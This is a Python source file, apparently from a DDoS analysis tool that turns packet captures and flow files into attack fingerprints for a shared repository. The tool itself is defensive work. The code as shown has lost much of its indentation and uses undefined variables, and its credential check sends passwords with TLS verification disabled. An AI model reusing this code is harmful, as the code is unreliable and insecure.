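# and the population std (ddof=0) is ~1124, so 2799 maps to
# round((2799 - 1576) / 1124) = 1.0 and 86 maps to round((86 - 1576) / 1124) = -1.0.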
#------------------------------------------------------------------------------
def infer_target_ip (df,n_type):
"""
df: dataframe from pcap
n_type: network file type (flows,pcap)
return: list of target IPs
"""
# check if the second most common value is grouped in 'others'
#
# ip_dst count percent zscore
# 94.198.154.130 2799 50 4.0
# others 1842 33 2.0 <-- not an outlier
# 94.198.154.24 86 2 -0.0
data = top_n_dataframe(df.ip_dst,df,n_type)
data = data[(data.iloc[1,0] == "others") & (data['zscore'] <3)].size
if not data:
logger.info("There are several destination IP in the dataset. High entropy. Effectiveness will be low.")
# find outlier
outlier = find_outlier(df['ip_dst'],df,n_type)
if (not outlier or len(outlier)<1):
logger.debug("We cannot find the DDoS target IP address. Not enought info to find the outlier.")
logger.debug("Trying to aggregate top IPs")
data = top_n_dataframe(df['ip_dst'],df,n_type)
        # Outlier was not found (attack targeting multiple IP addresses)
        # Try to cluster the victim IPs. Usually they are part of the same network block.
        # Select IPs responsible for more than 20% of the traffic and try to cluster them.
        # If the IPs are in the same range (network mask longer than /21), we combine them and set the result as the target.
data_ = data[(data['percent']> 20)]['ip_dst'].tolist()
ip_lst = sorted(data[(data['percent']> 20)]['ip_dst'].tolist())
# filter ipv4|ipv6 only
ips = []
for ip in ip_lst:
try:
ipaddr.IPAddress(ip)
except:
continue
ips.append(ip)
        # only one IP address was returned
if (len(ips)<2):
return (ips,df)
lowest_ip = ips[0]
highest_ip = ips[-1]
# aggregation mask size
mask_length = ipaddr._get_prefix_length(int(lowest_ip), int(highest_ip), lowest_ip.max_prefixlen)
if (mask_length > 21):
logger.debug("Top IPs are correlated")
            # rewrite the other clustered IPs to a single IP address
            for ip in ip_lst[1:]:
                df.loc[df['ip_dst'] == ip,"ip_dst"] = ip_lst[0]
return ( (ip_lst[0]).split(), df)
else:
# return the top 1
return (list(df['ip_dst'].value_counts().keys()[0]),df)
else:
return (outlier,df)
#------------------------------------------------------------------------------
def animated_loading(msg="loading "):
"""
print loading animation
:param msg: prefix label
"""
chars = "▁▂▃▄▅▆▇▇▇▆▅▄▃▁"
cursor.hide()
for char in chars:
#sys.stdout.write('\r'+msg+''+char)
sys.stdout.write('\r'+'['+char+'] '+msg)
time.sleep(.1)
sys.stdout.flush()
cursor.show()
#------------------------------------------------------------------------------
def find_outlier(df_filtered,df,n_type,strict=0):
"""
Find outlier based in zscore
:param df_filtered: dataframe filtered by target_ip
:param df: full dataframe used for flows analysis
:param n_type: network file type (flows,pcap)
    :param strict: make the outlier detection stricter (ignore zscore, use frequency)
"""
field_name = df_filtered.name
# summarization dataframe
data = top_n_dataframe(df_filtered,df,n_type)
if (data.empty):
return
outlier_field = data.columns[0]
# be more strict in the filter
if (strict):
data_ = data[(data['percent']> SIMILARITY_THRESHOLD) & (data['zscore']>2)]
# if the filter does not return anything, check if the df is
        # composed of only one field
if (data_.size==0):
# get first line from the summarized dataframe
data = data.head(1)
# ignore zscore, use frequency threshold
data = data[(data['percent']> SIMILARITY_THRESHOLD) & (data['zscore']<0) & (data[outlier_field]!="others")]
if (data.empty): return
outliers = data.iloc[:,0].tolist()
logger.debug("Outliers for .:{}:. --> {} \n {}" .format(outlier_field, outliers, data.head(5).to_string(index=False) ))
logger.debug('-' * 60)
return (outliers)
else:
# return the filtered dataframe saved in aux var
data = data_
# regular process - no strict
else:
data = data[(data['percent']> SIMILARITY_THRESHOLD) | (data['zscore']>2)]
if (len(data)==0): return None
outliers = data.iloc[:,0].tolist()
if (outliers == NONE):
logger.debug("Outliers for .:{}:. --> None \n {}" .format(data.columns[0], data.head(5).to_string(index=False) ))
return
# remove outlier when dispersion is equal to `others` values, for example:
# srcport count percent zscore
# 443 2157 39 3.0
# others 2135 38 3.0
zscore_others = data.loc[data[outlier_field] == "others", 'zscore'].tolist()
if (zscore_others):
            # remove all fields with the same value as `others`
outliers = data[data.zscore!=zscore_others[0]].iloc[:,0].tolist()
logger.debug('-' * 60)
if (len(outliers)>0):
logger.debug("Outliers for .:{}:. --> {} \n {}" .format(data.columns[0], outliers, data.head(5).to_string(index=False) ))
return outliers
else:
logger.debug("Outliers for .:{}:. --> None \n {}" .format(data.columns[0], data.head(5).to_string(index=False) ))
return None
#------------------------------------------------------------------------------
# Infer the attack based on filtered dataframe
def infer_protocol_attack(df,n_type):
"""
    Evaluate the protocol distribution and return the protocols used in the attack
    :param df: dataframe
    :param n_type: network file type (flows,pcap)
    return: the list of top protocols and whether fragmentation has been found
"""
target_ip = df['ip_dst'].iloc[0]
logger.info("A total of {} IPs have attacked the victim {}".format(df.ip_src.nunique(), target_ip))
# find protocol outliers
outlier = find_outlier(df['highest_protocol'],df,n_type)
# there is no outlier
if not outlier:
# top protocol in the distribution
top1_protocol = df["highest_protocol"].value_counts().keys()[0]
# IPv4 and IPv6 as highest_protocol denotes a fragmentation attack
if bool(re.search('IPv[46]',top1_protocol)):
frag = True
data = top_n_dataframe(df['highest_protocol'],df,n_type)
# fragmentation attack is bigger than 50% of the provided traffic (empirical value)
if (data['percent'].iloc[0] > 50):
logger.debug("Frag Attack: a large fraction of traffic {}% is related to fragmentation attack".format(data['percent'].iloc[0]))
# remove fragmentation protocol from the dataframe
data = top_n_dataframe(df['highest_protocol'],df[df['highest_protocol'] != "IPv4"],n_type)
# find outlier again by ignoring fragmentation protocol (just removed)
outlier = find_outlier(data['highest_protocol'],data,n_type)
if not outlier:
# still no outlier. It seems that we have an even protocol distribution
                    # this may be caused by a multi-vector attack
                    # If the remaining protocols have a similar distribution (+-30%) use them as outliers - empirical
data = data[(data['percent']>30) & (data['highest_protocol']!="others")]
protocol_list = data.sort_values(by="percent",ascending=False)['highest_protocol'].tolist()
#protocol_list = data[data['percent']>30].sort_values(by="percent",ascending=False)['highest_protocol'].tolist()
return (protocol_list,frag)
else:
# did not get outliers and it is not fragmentation attack
# multiprotocol attack with no fragmentation
frag = False
data = top_n_dataframe(df['highest_protocol'],df,n_type)
            # If the remaining protocols have a similar distribution (+-30%) use them as outliers - empirical
data = data[(data['percent']>30) & (data['highest_protocol']!="others")]
protocol_list = data.sort_values(by="percent",ascending=False)['highest_protocol'].tolist()
return (protocol_list,frag)
else:
# outlier found
logger.debug("Protocol outlier found: {}".format(outlier))
# return the top1
logger.debug("Top1 protocol could be classified as outlier")
top1_protocol = df["highest_protocol"].value_counts().reset_index().head(1)['index'].tolist()
frag = False
return (top1_protocol,frag)
return None
#------------------------------------------------------------------------------
def determine_file_type(input_file):
"""
Determine what sort of file the input is.
:param input_file: The path to the file, e.g. /home/user/example.pcap
:return: The file type of the input file as a string
:raises UnsupportedFileTypeError: If input file is not recognised or not supported
"""
file_ = shutil.which("file")
if not file_:
logger.error("File software not found. It should be on the path.\n")
return (NONE)
file_info, error = subprocess.Popen([file_, input_file], stdout=subprocess.PIPE).communicate()
file_type = file_info.decode("utf-8").split()[1]
if file_type == "tcpdump":
return "pcap"
if file_type == "pcap":
return "pcap"
elif file_type == "pcap-ng":
return "pcapng"
elif file_type == "data" and (b"nfdump" in file_info or b"nfcapd" in file_info):
return "nfdump"
else:
logger.critical("The file [{}] type [{}] is not supported.".format(input_file,file_type))
sys.exit(0)
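# Example of the `file` output the parsing above relies on (illustrative):
#   "sample1.pcap: tcpdump capture file (little-endian) - version 2.4 ..."
# split()[1] yields "tcpdump", which is mapped to the "pcap" type.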
#------------------------------------------------------------------------------
def load_file(args):
"""
    Wrapper that converts the attack file to a dataframe
:param args: command line parameters
:return n_type: network file type (flows,pcap)
:return df: dataframe itself
"""
file_type = determine_file_type(args.filename)
if (file_type == NONE):
return (NONE,NONE)
if re.search(r'nfdump', file_type):
load_function = flow_to_df
n_type = FLOW_TYPE
elif re.search(r'pcap', file_type):
load_function = pcap_to_df
n_type = PCAP_TYPE
# load dataframe using threading
ret = queue.Queue()
the_process = threading.Thread(name='process', target=load_function, args=(ret,args.filename))
the_process.start()
msg = "Loading network file: `{}' ".format(args.filename)
try:
while the_process.is_alive():
if the_process:
animated_loading(msg) if not (args.quiet) else 0
the_process.join()
except (KeyboardInterrupt, SystemExit):
signal_handler(None,None)
df = ret.get()
# not a dataframe
if not isinstance(df, pd.DataFrame):
print ("\n")
return(NONE,NONE)
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
return (n_type,df)
#------------------------------------------------------------------------------
def clusterization_non_multifrag(df_filtered,n_type):
"""
    Generic heuristic to deal with low-accuracy fingerprints
    :param df_filtered: dataframe filtered by target_ip
:param n_type: network file type (flows,pcap)
:return fingerprint: json file
"""
logger.debug("ATTACK TYPE 3: NON MULTIFRAG FRAGMENTATION ATTACK")
fields = df_filtered.columns.tolist()
if "eth_type" in fields: fields.remove("eth_type")
fingerprint = {}
for field in fields:
outlier = find_outlier(df_filtered[field],df_filtered,n_type,True)
if (outlier):
if (outlier != [NONE]):
fingerprint.update( {field : outlier} )
return (fingerprint)
#------------------------------------------------------------------------------
def clusterization_multifrag(df_filtered,n_type):
"""
    Determine whether multiple protocols were used for the fragmentation attack
    :param df_filtered: dataframe filtered by target_ip
:param n_type: network file type (flows,pcap)
:return fingerprint: json file
"""
fingerprint = {}
df_ = df.fragmentation.value_counts(normalize=True).mul(100).reset_index()
value = df_.loc[:,"fragmentation"].values[0]
df_['index']=df_['index'].astype(bool)
# percentage of packets with fragmentation
try:
frag_percentage = df_[(df_['fragmentation']>SIMILARITY_THRESHOLD) & (df_['index'].values)[0]==True].values[0][1]
except (ValueError,IndexError):
return None
# high chances to have multi protocol frag attack
if (frag_percentage > SIMILARITY_THRESHOLD):
logger.debug("ATTACK TYPE 2: MULTIPROTOCOL FRAGMENTATION ATTACK")
# find protocols responsible for that fragmentation
df_ = df.groupby(['highest_protocol','fragmentation'])['fragmentation'].count().to_frame().\
rename(columns={'fragmentation':'count'}).reset_index()
        # there may be more than one protocol responsible for that fragmentation percentage per group
# then, find the percentage of frag per protocol
df_['percent_frag'] = df_.groupby(['highest_protocol'])['count'].transform(lambda x: (x/x.sum()).mul(100))
df_['percent'] = (df_['count'] / df_['count'].sum()) * 100
df_['fragmentation']=df_['fragmentation'].astype(bool)
# protocol with high percentage of frag
protocols = df_[(df_.fragmentation == True) & (df_.percent>SIMILARITY_THRESHOLD) & \
(df_.percent_frag>SIMILARITY_THRESHOLD) ]['highest_protocol'].tolist()
if not protocols:
return
# find respective src_port
logger.info("Reprocessing attack based on protocols: {}".format(protocols))
df_filtered = df_filtered[df_filtered.highest_protocol.isin(protocols)]
srcports_frag = df[df.highest_protocol.isin(protocols)]['srcport'].unique().tolist()
outlier = find_outlier(df[df.highest_protocol.isin(protocols)]['srcport'],df_filtered,n_type)
# remove port "NONE" (assigned to IPv4 frag protocol)
if (NONE in srcports_frag) or (not outlier):
#srcports_frag.remove(NONE)
srcports_frag = [NONE]
else:
# add srcport to the fingerprint
fingerprint.update( { "srcport" : srcports_frag } )
fields = df_filtered.columns.tolist()
if "eth_type" in fields: fields.remove("eth_type")
for field in fields:
outlier = find_outlier(df_filtered[field],df,n_type)
if (outlier):
if (outlier != [NONE]):
fingerprint.update( {field : outlier} )
        # remove fields that may overlap the srcport outliers
if 'ip_proto' in fingerprint:
del fingerprint['ip_proto']
if 'ip_ttl' in fingerprint:
del fingerprint['ip_ttl']
return (fingerprint)
#------------------------------------------------------------------------------
def generate_dot_file(df_fingerprint, df):
"""
Build .dot file that is used to generate a png file showing the
fingerprint match visualization
:param df_fingerprint: dataframe filtered based on matched fingerprint
:param df: dataframe itself
"""
# sum up dataframe to plot
df_fingerprint = df_fingerprint[['ip_src','ip_dst']].drop_duplicates(keep="first")
df_fingerprint['match'] = 1
df_remain = df[['ip_src','ip_dst']].drop_duplicates(keep="first")
df_remain['match'] = 0
df_plot = pd.concat([df_fingerprint,df_remain], ignore_index=True)
# anonymize plot data
df_plot.reset_index(inplace=True)
df_plot.drop('ip_src',axis=1,inplace=True)
df_plot = df_plot.rename(columns={"index": "ip_src"})
df_plot['ip_dst'] = "victim"
logger.debug("Distribution of filtered traffic: \n{}".format(df_plot.match.value_counts(normalize=True).mul(100)))
filename, file_extension = os.path.splitext(args.filename)
with open(filename+".dot", 'w+', encoding = 'utf-8') as f:
f.write("graph {\n")
for index, row in df_plot.iterrows():
if (row['match'] == 0 ):
f.write("\t {} -- {}[color=green,penwidth=1.0];\n".format(row["ip_src"], row["ip_dst"]))
else:
f.write("\t {} -- {}[color=red,penwidth=2.0];\n".format(row["ip_src"], row["ip_dst"]))
f.write("}\n")
print ("Use the following command to generate an image:")
print ("\t sfdp -x -Goverlap=scale -Tpng {}.dot > {}.png".format(filename,filename))
# print ("\t convert {}.png -gravity North -background YellowGreen -splice 0x18 -annotate +0+2 'Dissector' {}.gif ".format(filename,filename))
#------------------------------------------------------------------------------
def printProgressBar(value,label,fill_chars="■-"):
"""
Print a progress bar
:param value: percentage (0-100) to be rendered
:param label: label used as title
:param fill_chars: two characters used for the filled and empty parts of the bar
"""
if (args.quiet): return True
n_bar = 40 #size of progress bar
max = 100
j= value/max
sys.stdout.write('\r')
bar = fill_chars[0] * int(n_bar * j)
bar = bar + fill_chars[1] * int(n_bar * (1-j))
sys.stdout.write(f"{label.ljust(16)} | [{bar:{n_bar}s}] {int(100 * j)}% ")
sys.stdout.flush()
print ("")
return True
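# Example (hypothetical call): printProgressBar(75, "TRAFFIC MATCHED") renders a
# 40-character bar with int(40 * 0.75) = 30 filled characters and
# int(40 * 0.25) = 10 empty ones, roughly:
#   TRAFFIC MATCHED  | [■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■----------] 75%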
#------------------------------------------------------------------------------
def evaluate_fingerprint(df,df_fingerprint,fingerprints):
"""
:param df: dataframe itself
:param df_fingerprint: dataframe filtered based on matched fingerprint
:param fingerprints: generated fingerprint (dict with the attack vectors)
:return: the traffic/IP matching percentages are printed and logged
"""
total_rows_matched = len(df_fingerprint)
msg = "Fingerprint evaluation"
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
logger.info("TRAFFIC MATCHED: {0}%. The generated fingerprint will filter {0}% of the analysed traffic".format(round(len(df_fingerprint)*100/len(df))))
percentage_of_ips_matched = len(df_fingerprint['ip_src'].unique().tolist() )*100/len(df.ip_src.unique().tolist())
logger.info("IPS MATCHED : {0}%. The generated fingerprint will filter {0}% of SRC_IPs".format(round(percentage_of_ips_matched)))
if not (args.quiet):
value = round(len(df_fingerprint)*100/len(df))
printProgressBar(value,"TRAFFIC MATCHED")
printProgressBar(round(percentage_of_ips_matched),"IPs MATCHED")
#
# Fields breakdown
#
if (args.verbose) or (args.debug):
count = 0
df.fragmentation = df.fragmentation.astype(str)
# for each fingerprint generated
for fingerprint in (fingerprints['attack_vector']):
count = count + 1
results = {}
for key, value in fingerprint.items():
val = ','.join(str(v) for v in value)
val = val.split()
total_rows_matched = len(df[df[key].isin(val)])
percentage = round(total_rows_matched*100/len(df))
# dict with all the fields and results
results.update( {key: percentage} )
results_sorted = {k: v for k, v in sorted(results.items(), key=lambda item: item[1], reverse=True)}
logger.info(" ============= FIELDS BREAKDOWN === ATTACK_VECTOR {} ============= ".format(count))
for label, percentage in results_sorted.items():
printProgressBar(percentage,label,"▭ ")
return ()
#------------------------------------------------------------------------------
def check_repository(config):
"""
Check repository access and credentials
:param config: parsed configuration (configparser.ConfigParser instance)
"""
logger.info("Checking repository")
url = "https://raw.githubusercontent.com/ddos-clearing-house/ddos_dissector/2.0/repository.txt"
response = requests.get(url)
servers = response.content.decode("utf-8").split()
login = ""
table_column = 3
row_format ="{:>22}" * (table_column)
print(row_format.format("\nServer", "Status", "Credentials"))
print ("--"*25)
for server in servers:
try:
code = requests.get(server, timeout=2).status_code
except:
code = "OFFLINE"
if (code ==200):
code = "ONLINE"
# check credentials
headers = {
"X-Username": config['repository']['user'],
"X-Password": config['repository']['passwd'],
}
server_config = re.search('https?://(.*)/?', server).group(1)
# check if the configuration file has credentials for the online server
if (server_config in config.sections()):
if (config[server_config]):
headers = {
"X-Username": config[server_config]['user'],
"X-Password": config[server_config]['passwd'],
}
else:
logger.info("Credentials from {} is not available in the configuration file [ddosdb.conf]")
login = "NOT_OK"
try:
r = requests.get(server+"/my-permissions", headers=headers,verify=False)
except requests.exceptions.RequestException as e:
logger.critical("Cannot connect to the server to check credentials")
logger.debug("{}".format(e))
print (e)
continue
if (r.status_code==403):
print ("Invalid credentials or no permission to upload fingerprints:")
login = "NOT_OK"
elif (r.status_code==200):
login = "SUCCESS"
row_format ="{:>15}" * (table_column)
print(row_format.format(server, code, login))
sys.exit(0)
#------------------------------------------------------------------------------
def get_matching_ratio(df_attack_vector,fingerprint):
"""
Get matching ratio for each fingerprint found
:param df_attack_vector: dataframe related to the fingerprint
:param fingerprint: dictionary with matched fields
:return: tuple (filtered dataframe, dict with ratio and fingerprint)
"""
if not fingerprint:
return (NONE,NONE)
df_fingerprint = df_attack_vector
for key, value in fingerprint.items():
# ignore metadata field
if key not in df_fingerprint.columns:
continue
df_fingerprint = df_fingerprint[df_fingerprint[key].isin(value)]
# evaluate fingerprint matching ratio
accuracy_ratio = round(len(df_fingerprint)*100/len(df_attack_vector))
d = { "ratio" : accuracy_ratio,
"fingerprint" : fingerprint
}
return (df_fingerprint,d)
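# Illustrative sketch (hypothetical data): what get_matching_ratio returns for a
# small attack-vector dataframe and a two-field fingerprint.
def _example_matching_ratio():
    import pandas as pd
    df_toy = pd.DataFrame({
        "srcport": [53, 53, 80, 123],
        "highest_protocol": ["DNS", "DNS", "HTTP", "NTP"],
    })
    toy_fingerprint = {"srcport": [53], "highest_protocol": ["DNS"]}
    df_match, ratio_info = get_matching_ratio(df_toy, toy_fingerprint)
    # 2 of the 4 rows carry srcport 53 with protocol DNS, so the ratio is 50
    assert ratio_info["ratio"] == 50
    return df_match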
#------------------------------------------------------------------------------
def clusterization_heuristic_generic(df_attack_vector,n_type):
fields = df_attack_vector.columns.tolist()
if "eth_type" in fields: fields.remove("eth_type")
logger.debug("ATTACK TYPE 1: GENERIC ")
fingerprint = {}
for field in fields:
outlier = find_outlier(df_attack_vector[field],df_attack_vector,n_type)
if (outlier):
if (outlier != [NONE]):
fingerprint.update( {field : outlier} )
return (fingerprint)
#------------------------------------------------------------------------------
def build_attack_fingerprint(df,df_attack_vector,n_type,multi_vector_attack_flag):
"""
Build the fingerprint of one attack vector by applying three clusterization heuristics
:param df: dataframe itself
:param df_attack_vector: dataframe filtered by target IP and attack protocol
:param n_type: network file type (flows,pcap)
:param multi_vector_attack_flag: attack composed of multiple protocols
:return fingerprint: fingerprint dictionary
"""
# remove target IP from dataframe since it will be anonymized
del df_attack_vector['ip_dst']
attack_vector_protocol = df_attack_vector['highest_protocol'].iloc[0]
logger.info("Processing attack_vector based on {}".format(attack_vector_protocol))
# DETECTION RATE HEURISTIC
dic_ratio_array = []
### FIRST HEURISTIC
fingerprint = clusterization_heuristic_generic(df_attack_vector,n_type)
if (multi_vector_attack_flag):
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df_attack_vector,fingerprint)
else:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprint)
logger.debug(dict_accuracy_ratio)
if (dict_accuracy_ratio != NONE):
logger.debug('-' * 60)
logger.info("HEURISTIC 1: matching ratio {}%".format((dict_accuracy_ratio.get("ratio"))))
logger.debug("First heuristic matching ratio = {}".format(dict_accuracy_ratio.get("ratio")))
logger.debug("First heuristic fingerprint = {}".format((dict_accuracy_ratio.get("fingerprint"))))
logger.debug("First fingerprint lengh = {}".format(len(dict_accuracy_ratio.get("fingerprint"))))
logger.debug('-' * 60)
dict_accuracy_ratio['size'] = len(dict_accuracy_ratio.get("fingerprint"))
dic_ratio_array.append(dict_accuracy_ratio)
else:
logger.info("HEURISTIC 1: matching ratio 0%")
### SECOND HEURISTIC
fingerprint = clusterization_multifrag(df_attack_vector,n_type)
if (multi_vector_attack_flag):
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df_attack_vector,fingerprint)
else:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprint)
logger.debug(dict_accuracy_ratio)
if (dict_accuracy_ratio != NONE):
logger.debug('-' * 60)
logger.info("HEURISTIC 2: matching ratio {}%".format((dict_accuracy_ratio.get("ratio"))))
logger.debug("Second heuristic matching ratio = {}".format(dict_accuracy_ratio.get("ratio")))
logger.debug("Second heuristic fingerprint = {}".format((dict_accuracy_ratio.get("fingerprint"))))
logger.debug("Second fingerprint lengh = {}".format(len(dict_accuracy_ratio.get("fingerprint"))))
logger.debug('-' * 60)
dict_accuracy_ratio['size'] = len(dict_accuracy_ratio.get("fingerprint"))
dic_ratio_array.append(dict_accuracy_ratio)
else:
logger.info("HEURISTIC 2: matching ratio 0%")
### THIRD HEURISTIC
fingerprint = clusterization_non_multifrag(df_attack_vector,n_type)
if (multi_vector_attack_flag):
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df_attack_vector,fingerprint)
else:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprint)
if (dict_accuracy_ratio != NONE):
logger.info("HEURISTIC 3: matching ratio {}%".format((dict_accuracy_ratio.get("ratio"))))
logger.debug("Third heuristic matching ratio = {}".format(dict_accuracy_ratio.get("ratio")))
logger.debug("Third heuristic fingerprint = {}".format((dict_accuracy_ratio.get("fingerprint"))))
logger.debug("Third fingerprint lengh = {}".format(len(dict_accuracy_ratio.get("fingerprint"))))
logger.debug('-' * 60)
dict_accuracy_ratio['size'] = len(dict_accuracy_ratio.get("fingerprint"))
dic_ratio_array.append(dict_accuracy_ratio)
else:
logger.info("HEURISTIC 3: matching ratio 0%")
# pick the best matching rate
df_ = pd.DataFrame(dic_ratio_array)
logger.debug("Fingerprint found")
logger.debug(df_)
data = df_.sort_values(by="size",ascending=True)
# filter fingerprint with more than 2 fields
data = data[data['size'] > 2]
data["diff"] = data.ratio.diff().fillna(0).astype(int)
# Pick the longest fingerprint (it is more specific)
# If the longer fingerprint loses at most 10 points of detection ratio, still prefer it
fingerprint = data[data['diff']>-10].sort_values(by="size",ascending=False).head(1)['fingerprint'].values[0]
# if no longer fingerprint qualified, fall back to the one with the best ratio
if not fingerprint:
fingerprint = df_.sort_values(by="ratio",ascending=False).loc[0,"fingerprint"]
print (df_.sort_values(by="ratio",ascending=False).loc[0,"ratio"])
return (fingerprint)
#------------------------------------------------------------------------------
def bar(row):
"""
Plot ASCII bar
:param row: dataframe row containing 'index', 'counts' and 'percent' fields
"""
percent = int(row['percent'])
bar_chunks, remainder = divmod(int(percent * 8 / increment), 8)
count = str(row['counts'])
label = row['index']
percent = str(percent)
bar = '█' * bar_chunks
if remainder > 0:
bar += chr(ord('█') + (8 - remainder))
# If the bar is empty, add a left one-eighth block
bar = bar or '▏'
print ("{} | {} - {}% {}".format( label.rjust(longest_label_length), count.rjust(longest_count_length),percent.rjust(3), bar ))
return ()
#------------------------------------------------------------------------------
def add_label(fingerprints,df):
"""
Infer descriptive labels (tags) for the generated fingerprints
"""
# UDP Service Mapping
udp_service = {
25: 'SMTP',
123: 'NTP',
1121: 'Memcached',
1194: 'OpenVPN',
1434: 'SQL server',
1718: 'H323',
1900: 'SSDP',
3074: 'Game Server',
3283: 'Apple Remote Desktop',
3702: 'WSD - Web Services Discovery',
5683: 'CoAP',
20800: 'Game Server',
27015: 'Game Server',
30718: 'IoT Lantronix',
33848: 'Jenkins Server',
37810: 'DVR DHCPDiscover',
47808: 'BACnet',
}
generic_amplification_ports = [53, 389, 123, 161, 672]
label = []
for fingerprint in fingerprints:
if (len(fingerprints)>1):
label.append("MULTI_VECTOR_ATTACK")
else:
label.append("SINGLE_VECTOR_ATTACK")
# add protocol name to label list
if 'highest_protocol' in fingerprint:
label.append(", ".join(fingerprint['highest_protocol']))
if 'dns_qry_name' in fingerprint:
label.append("DNS_QUERY")
if 'udp_length' in fingerprint:
# Based on FBI Flash Report MU-000132-DD
df_length = (df.groupby(['srcport'])['udp_length'].max()).reset_index()
if (df_length.udp_length > 468).any():
label.append("UDP_SUSPECT_LENGTH")
for port in udp_service:
if ("srcport" in fingerprint):
if (fingerprint['srcport'] == [port]):
label.append("AMPLIFICATION")
label.append("RDDoS")
label.append(udp_service[port])
# Frag attack
if 'fragmentation' in fingerprint:
value = fingerprint.get('fragmentation')[0]
if (value==True):
label.append("FRAGMENTATION")
# Generic amplification attack
if ("srcport" in fingerprint):
if (len(fingerprint['srcport']) > 1):
label.append("MULTIPROTOCOL")
for port in generic_amplification_ports:
if (port in list(fingerprint['srcport'])):
label.append("AMPLIFICATION")
continue
return (list(set(label)))
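# Illustrative sketch (hypothetical fingerprint): the kind of tag list add_label
# produces for a single NTP amplification vector.
#
#   example_fingerprints = [{
#       "highest_protocol": ["NTP"],
#       "srcport": [123],
#       "fragmentation": [False],
#   }]
#   # add_label(example_fingerprints, df) would return tags such as
#   # ['SINGLE_VECTOR_ATTACK', 'NTP', 'AMPLIFICATION', 'RDDoS'] (order may vary)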
#------------------------------------------------------------------------------
def logo():
print ('''
_____ _____ _____ _____ ____
| __ \| __ \ / ____| __ \| _ \
| | | | | | | ___| (___ | | | | |_) |
| | | | | | |/ _ \\\___ \| | | | _ <
| |__| | |__| | (_) |___) | |__| | |_) |
|_____/|_____/ \___/_____/|_____/|____/
''')
#------------------------------------------------------------------------------
def import_logfile(args):
"""
Load configuration file to structured format
:param args: command line parameters
:return config: structured format
"""
if (args.config):
if os.path.isfile(args.config) and os.access(args.config, os.R_OK):
msg = "Using configuration file [{}]".format(args.config)
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
logger.debug("Configuration found: {}".format(args.config))
config = configparser.ConfigParser()
config.read(args.config)
return (config)
else:
print ("Configuration file provided [{}] not found ".format(args.config))
return None
#------------------------------------------------------------------------------
def prepare_fingerprint_upload(df_fingerprint,df,fingerprints,n_type,labels,fingerprint_dir):
"""
Add additional fields and stats to the generated fingerprint
:param df_fingerprint: dataframe filtered based on matched fingerprint
:param df: dataframe itself
:param fingerprints: list of fingerprint dictionaries (one per attack vector)
:param n_type: network file type (flows,pcap)
:param labels: inferred tags
:param fingerprint_dir: directory used to save the fingerprint json file
:return: tuple (fingerprint dictionary, path of the saved json file)
"""
fingerprint_combined = {}
fingerprint_array = []
# add one_line_fingerprint (summary) to each attack_vector fingerprint
for attack_vector in fingerprints:
attack_vector_anon = copy.deepcopy(attack_vector)
attack_vector_anon.update({"src_ips": "omitted"})
del attack_vector_anon['attack_vector_key']
one_line_fingerprint = str(attack_vector_anon).translate(str.maketrans("", "", "[]"))
attack_vector.update({"one_line_fingerprint": one_line_fingerprint })
fingerprint_array.append(attack_vector)
# fingerprints
fingerprint_combined.update({"attack_vector": fingerprint_array})
# timestamp fields
initial_timestamp = df_fingerprint['frame_time_epoch'].min()
initial_timestamp = datetime.utcfromtimestamp(initial_timestamp).strftime('%Y-%m-%d %H:%M:%S')
fingerprint_combined.update( {"start_time": initial_timestamp} )
duration_sec = df_fingerprint['frame_time_epoch'].max() - df_fingerprint['frame_time_epoch'].min()
duration_sec = '{:.2f}'.format(duration_sec)
fingerprint_combined.update( {"duration_sec": float(duration_sec)} )
fingerprint_combined.update( {"total_dst_ports": len(df_fingerprint['dstport'].unique().tolist())} )
if (n_type == FLOW_TYPE):
# FIXME - should consider the sample rate
fingerprint_combined.update( {"avg_bps": int(df_fingerprint.in_packets.mean())})
fingerprint_combined.update( {"total_packets": int(df_fingerprint.in_packets.sum())})
else:
duration_sec = float(duration_sec)
fingerprint_combined.update( {"avg_bps": int(df_fingerprint.frame_len.sum()/duration_sec) })
fingerprint_combined.update( {"total_packets": len(df_fingerprint)} )
# keys used on the repository
sha256 = hashlib.sha256(str(fingerprint).encode()).hexdigest()
fingerprint_combined.update( {"ddos_attack_key": sha256} )
fingerprint_combined.update( {"key": sha256[:15]} )
fingerprint_combined.update( {"total_ips": len(df_fingerprint['ip_src'].unique().tolist()) })
if (n_type == 0):
n_type = "FLOW"
else:
n_type = "PCAP"
fingerprint_combined.update( {"file_type": n_type})
fingerprint_combined.update( {"tags": labels})
# save fingerprint to local file in order to enable the upload via POST
if not os.path.exists(fingerprint_dir):
os.makedirs(fingerprint_dir)
json_file = "{}/{}.json".format(fingerprint_dir,sha256[:32])
try:
with open(json_file, 'w') as f_fingerprint:
json.dump(fingerprint_combined, f_fingerprint)
files = {
"json": open(json_file, "rb"),
# ignoring pcap file upload for now
"pcap": open(json_file, "rb"),
}
except:
logger.info("Could not save fingerprint {}".format(json_file))
return (fingerprint_combined,json_file)
#------------------------------------------------------------------------------
def print_fingerprint(fingerprint):
"""
Print a summarized version of the fingerprint generated using
the highlight module.
"""
# anon src_ips
attack_vectors_array = fingerprint["attack_vector"]
anon_attack_vector = []
for vector in attack_vectors_array:
vector.update({"src_ips": "ommited"})
anon_attack_vector.append(vector)
fingerprint["attack_vector"] = anon_attack_vector
fingerprint.update({"tags": labels})
json_str = json.dumps(fingerprint, indent=4, sort_keys=True)
msg = "Generated fingerprint"
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
print(highlight(json_str, JsonLexer(), TerminalFormatter()))
#------------------------------------------------------------------------------
def evaluate_fingerprint_ratio(df,fingerprints,fragmentation_attack_flag):
"""
Take the generated fingerprints and compute the matching dataframe using the input file
:param df: input dataframe
:param fingerprints: list of fingerprint dictionaries
:param fragmentation_attack_flag: fragmentation flag (network layer) used to cluster data without layer 7 info
"""
if (len(fingerprints)==0):
print ("Could not find a fingerprint for this network file :(" )
sys.exit()
if (len(fingerprints)==1):
# only one fingerprint was found
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprints[0])
if fragmentation_attack_flag:
